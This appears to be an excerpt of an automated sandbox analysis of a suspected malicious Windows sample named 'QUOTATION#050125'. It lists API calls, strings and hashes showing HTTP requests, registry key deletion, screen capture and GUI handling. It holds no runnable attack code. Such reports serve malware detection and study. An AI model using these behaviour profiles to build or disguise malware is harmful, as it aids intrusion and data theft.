• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00134059
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00134087
Strings
Similarity
• API ID: SendString$BuffCharDriveLowerType
• String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
• API String ID: 1600147383-4113822522
• Opcode ID: ff6911b40bccd8b3dd6c418c5c9c3886f9e561b14d01b485bba53bdbeaa4cccd
• Instruction ID: e1324fc5dd033e8f354b299519768571aed88a4d96f33b628c37b87ee71531f3
• Opcode Fuzzy Hash: ff6911b40bccd8b3dd6c418c5c9c3886f9e561b14d01b485bba53bdbeaa4cccd
• Instruction Fuzzy Hash: 6871E4326043019FC714EF24C8819AEB7F4EF94758F50492DF8A697252EB31EE45CB92
APIs
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001583F2
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00155BF2), ref: 0015844E
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00158487
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001584CA
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00158501
• FreeLibrary.KERNEL32(?), ref: 0015850D
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0015851D
• DestroyIcon.USER32(?,?,?,?,?,00155BF2), ref: 0015852C
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00158549
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00158555
Strings
Similarity
• API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 1446636887-1154884017
• Opcode ID: 5ea143b0b7b2a1a90818490b03d3079eacb38f8f2ef5ac0ac1d9ae790ed22348
• Instruction ID: 7df2516ab6c7da0ac2d8d2d898f3f6545676ad3b5ec096f8992cb94430fc5223
• Opcode Fuzzy Hash: 5ea143b0b7b2a1a90818490b03d3079eacb38f8f2ef5ac0ac1d9ae790ed22348
• Instruction Fuzzy Hash: A2619E71510715FEEB149F64CC85BFE77A8BB08722F104509FD25EA1D1EBB4AA84CBA0
APIs
• DestroyWindow.USER32(?,?), ref: 00156DEB
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00156E5F
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00156E81
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00156E94
• DestroyWindow.USER32(?), ref: 00156EB5
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000C0000,00000000), ref: 00156EE4
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00156EFD
• GetDesktopWindow.USER32 ref: 00156F16
• GetWindowRect.USER32(00000000), ref: 00156F1D
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00156F35
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00156F4D
  • Part of subcall function 000D9944: GetWindowLongW.USER32(?,000000EB), ref: 000D9952
Strings
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect
• String ID: 0$tooltips_class32
• API String ID: 1652260434-3619404913
• Opcode ID: 7eaa074694f524a8d4f232a1e85890d5640e446b0e7a9fb2d493316559fde984
• Instruction ID: d2980b75ff6e75737208885cc1f0d7b50dc683c001117cde9582acf292676948
• Opcode Fuzzy Hash: 7eaa074694f524a8d4f232a1e85890d5640e446b0e7a9fb2d493316559fde984
• Instruction Fuzzy Hash: 34717970504341EFDB21CF18DC54FAABBE9FB99305F44051EF9998B261C770A98ACB91
APIs
  • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
• DragQueryPoint.SHELL32(?,?), ref: 00159147
  • Part of subcall function 00157674: ClientToScreen.USER32(?,?), ref: 0015769A
  • Part of subcall function 00157674: GetWindowRect.USER32(?,?), ref: 00157710
  • Part of subcall function 00157674: PtInRect.USER32(?,?,00158B89), ref: 00157720
• SendMessageW.USER32(?,000000B0,?,?), ref: 001591B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001591BB
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001591DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00159225
• SendMessageW.USER32(?,000000B0,?,?), ref: 0015923E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00159255
• SendMessageW.USER32(?,000000B1,?,?), ref: 00159277
• DragFinish.SHELL32(?), ref: 0015927E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00159371
Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                      • API String ID: 221274066-3440237614
                                                                                      • Opcode ID: b8959c2d926252fc0efe45f2c3facacfe9743d327c6a795543d0d92941d11c24
                                                                                      • Instruction ID: 8f56bcae9c06a40d9ba44279aef907fe2b3af17fbbcf772b7234567bf0220311
                                                                                      • Opcode Fuzzy Hash: b8959c2d926252fc0efe45f2c3facacfe9743d327c6a795543d0d92941d11c24
                                                                                      • Instruction Fuzzy Hash: 7D616B71108301EFD701EF64DC85EAFBBE8EF89750F00092EF5A5961A1DB709A49CB92
                                                                                      APIs
                                                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0013C4B0
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0013C4C3
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0013C4D7
                                                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0013C4F0
                                                                                      • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0013C533
                                                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0013C549
                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0013C554
                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0013C584
                                                                                      • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0013C5DC
                                                                                      • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0013C5F0
                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0013C5FB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                      • String ID:
                                                                                      • API String ID: 3800310941-3916222277
                                                                                      • Opcode ID: d19888c2a921183d54c650650c8e2e847c450c8aa866fa2d91dd59d42f53eed4
                                                                                      • Instruction ID: 5f23fd5e2e8e4be735ef458e4e079bc816384679c890b866a131984e1052eb96
                                                                                      • Opcode Fuzzy Hash: d19888c2a921183d54c650650c8e2e847c450c8aa866fa2d91dd59d42f53eed4
                                                                                      • Instruction Fuzzy Hash: BC514AB1600709FFDB219FA4CD88AAB7BBCFF08755F004419F945AA610DB35E944DBA0
                                                                                      APIs
                                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 00158592
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585A2
                                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585AD
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585BA
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 001585C8
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585D7
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 001585E0
                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585E7
                                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001585F8
                                                                                      • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,0015FC38,?), ref: 00158611
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00158621
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00158641
                                                                                      • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00158671
                                                                                      • DeleteObject.GDI32(?), ref: 00158699
                                                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001586AF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                      • String ID:
                                                                                      • API String ID: 3840717409-0
                                                                                      • Opcode ID: 0c8fa17a97642f755febb525b334915dbabbf168e3137a1df8689729a8cbff3e
                                                                                      • Instruction ID: b0f1f65f32c0a6856486671a90a9eadb47acc76410925d20c70a015f5acbdc6c
                                                                                      • Opcode Fuzzy Hash: 0c8fa17a97642f755febb525b334915dbabbf168e3137a1df8689729a8cbff3e
                                                                                      • Instruction Fuzzy Hash: 4D411975600308EFDB119FA5CC88EAA7BB8FF89716F104158F916EB260DB309945CF60
                                                                                      APIs
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00131502
                                                                                      • VariantCopy.OLEAUT32(?,?), ref: 0013150B
                                                                                      • VariantClear.OLEAUT32(?), ref: 00131517
                                                                                      • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 001315FB
                                                                                      • VarR8FromDec.OLEAUT32(?,?), ref: 00131657
                                                                                      • VariantInit.OLEAUT32(?), ref: 00131708
                                                                                      • SysFreeString.OLEAUT32(?), ref: 0013178C
                                                                                      • VariantClear.OLEAUT32(?), ref: 001317D8
                                                                                      • VariantClear.OLEAUT32(?), ref: 001317E7
                                                                                      • VariantInit.OLEAUT32(00000000), ref: 00131823
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                                                                      • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                      • API String ID: 1234038744-3931177956
                                                                                      • Opcode ID: 3aae492a8d96ed1338959e3a1ee8f0f025a322108aa2bf382199b020d596e83a
                                                                                      • Instruction ID: 0915a7c330b09240b3886f15c830174774ab2cfe60df5b1d81c46a24b7f5bf9a
                                                                                      • Opcode Fuzzy Hash: 3aae492a8d96ed1338959e3a1ee8f0f025a322108aa2bf382199b020d596e83a
                                                                                      • Instruction Fuzzy Hash: CFD11031A00205FFDB18AF65E885BBDB7B5BF46700F15845AF806AB681DB30EC45DBA1
                                                                                      APIs
                                                                                        • Part of subcall function 0014C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0014B6F4
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0014B772
                                                                                      • RegDeleteValueW.ADVAPI32(?,?), ref: 0014B80A
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014B87E
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0014B89C
                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0014B8F2
                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0014B904
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0014B922
                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 0014B983
                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0014B994
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 1742008743-4033151799
                                                                                      • Opcode ID: 4e75b5ab40649feb6a14b9eedfbce8ae7dfd754ca8cbc32c0d7f60eded4c0608
                                                                                      • Instruction ID: 8fbe726e8f38adfeba607226fa23e26b618d025a73c7fa4f196586af40bcc72d
                                                                                      • Opcode Fuzzy Hash: 4e75b5ab40649feb6a14b9eedfbce8ae7dfd754ca8cbc32c0d7f60eded4c0608
                                                                                      • Instruction Fuzzy Hash: A4C17874208202EFD714DF24C4D5F6ABBE5BF84318F14849CF49A8B6A2CB71E946CB91
                                                                                      APIs
                                                                                      • GetDC.USER32(00000000), ref: 001425D8
                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 001425E8
                                                                                      • CreateCompatibleDC.GDI32(?), ref: 001425F4
                                                                                      • SelectObject.GDI32(00000000,?), ref: 00142601
                                                                                      • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 0014266D
                                                                                      • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 001426AC
                                                                                      • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 001426D0
                                                                                      • SelectObject.GDI32(?,?), ref: 001426D8
                                                                                      • DeleteObject.GDI32(?), ref: 001426E1
                                                                                      • DeleteDC.GDI32(?), ref: 001426E8
                                                                                      • ReleaseDC.USER32(00000000,?), ref: 001426F3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                      • String ID: (
                                                                                      • API String ID: 2598888154-3887548279
                                                                                      • Opcode ID: 59bd49cd40086a2e9da0b63a302cf42f3c5bff1a064b63d3f42f1dca6b18d002
                                                                                      • Instruction ID: 4c2e3508312c2c9584858dc80d611fe734d5d996d389a6372e76109831cfebda
                                                                                      • Opcode Fuzzy Hash: 59bd49cd40086a2e9da0b63a302cf42f3c5bff1a064b63d3f42f1dca6b18d002
                                                                                      • Instruction Fuzzy Hash: C861C2B5D00319EFCF04CFA4D884AAEBBB6FF58310F208529E955A7250D774A991CFA4
                                                                                      APIs
                                                                                      • CharUpperBuffW.USER32(?,?,?,?,?,?,?,0014B6AE,?,?), ref: 0014C9B5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: BuffCharUpper
                                                                                      • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                      • API String ID: 3964851224-909552448
                                                                                      • Opcode ID: 6de378dadab809f07c84dade009ff97e38042545585b314a18bdfdd4d3237031
                                                                                      • Instruction ID: ba71192b8de4c67bc6f792799368609e041d7518f69318802a0f1b4c6feaa0ae
                                                                                      • Opcode Fuzzy Hash: 6de378dadab809f07c84dade009ff97e38042545585b314a18bdfdd4d3237031
                                                                                      • Instruction Fuzzy Hash: 0671F33260116A8BCB60DF7CC9915FE3391AFA1794B350528F866A72A5FB31CE44C7E0
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00158D5A
                                                                                      • GetFocus.USER32 ref: 00158D6A
                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 00158D75
                                                                                      • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?,?,?,?), ref: 00158E1D
                                                                                      • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00158ECF
                                                                                      • GetMenuItemCount.USER32(?), ref: 00158EEC
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 00158EFC
                                                                                      • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00158F2E
                                                                                      • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00158F70
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00158FA1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                       • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                       • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                      • String ID: 0
                                                                                      • API String ID: 1026556194-4108050209
                                                                                      • Opcode ID: 6a20533703d2c95c6a753d3b161dcf936852209e5d86f13b2564caf6da7eee88
                                                                                      • Instruction ID: af844f726131f46bf7bccf6ea476c6bea17e437a341c74bff9174a86be3cb9b8
                                                                                      • Opcode Fuzzy Hash: 6a20533703d2c95c6a753d3b161dcf936852209e5d86f13b2564caf6da7eee88
                                                                                      • Instruction Fuzzy Hash: 5881AF71604301EFD710CF24C885AABB7E9FB88355F04091AFDA5AB291DB70DD49CBA1
                                                                                      APIs
                                                                                      • GetMenuItemInfoW.USER32(00191990,000000FF,00000000,00000030), ref: 0012BFAC
                                                                                      • SetMenuItemInfoW.USER32(00191990,00000004,00000000,00000030), ref: 0012BFE1
                                                                                      • Sleep.KERNEL32(000001F4), ref: 0012BFF3
                                                                                      • GetMenuItemCount.USER32(?), ref: 0012C039
                                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0012C056
                                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 0012C082
                                                                                      • GetMenuItemID.USER32(?,?), ref: 0012C0C9
                                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0012C10F
                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0012C124
                                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0012C145
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                      • String ID: 0
                                                                                      • API String ID: 1460738036-4108050209
                                                                                      • Opcode ID: dd7b40be28e83d18e2be8b5af2b11344e51f5be6070ad57782e8ae72e00cc6bb
                                                                                      • Instruction ID: c86eed222bebbf01e171fc6fa06880ad389cd12d8aee5ca19b3b10d34afd9baa
                                                                                      • Opcode Fuzzy Hash: dd7b40be28e83d18e2be8b5af2b11344e51f5be6070ad57782e8ae72e00cc6bb
                                                                                      • Instruction Fuzzy Hash: 4E619E70A00366EFDB15CF64ED89AEEBBB8EF05344F140015FA01A7291D731AE65CBA0
                                                                                      APIs
                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0014CC64
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0014CC8D
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0014CD48
                                                                                        • Part of subcall function 0014CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0014CCAA
                                                                                        • Part of subcall function 0014CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0014CCBD
                                                                                        • Part of subcall function 0014CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0014CCCF
                                                                                        • Part of subcall function 0014CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0014CD05
                                                                                        • Part of subcall function 0014CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0014CD28
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 0014CCF3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                      • API String ID: 2734957052-4033151799
                                                                                      • Opcode ID: d0af634a031b4a05b1823aec30b54fa9eda5a19ba3d89a7935f3658f370c6403
                                                                                      • Instruction ID: 17e2d857282f53764eb53dca7a893d6bf258bca37461a61be06c5ec37b728b77
                                                                                      • Opcode Fuzzy Hash: d0af634a031b4a05b1823aec30b54fa9eda5a19ba3d89a7935f3658f370c6403
                                                                                      • Instruction Fuzzy Hash: C2316975902229FBDB209F94DC88EEFBB7CEF45751F000165B906E6260DB309A85DAE0
                                                                                      Strings
                                                                                      • InitializeConditionVariable, xrefs: 000E0148
                                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 000E0122
                                                                                      • SleepConditionVariableCS, xrefs: 000E0154
                                                                                      • WakeAllConditionVariable, xrefs: 000E0162
                                                                                      • kernel32.dll, xrefs: 000E0133
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule$CountCriticalInitializeSectionSpin
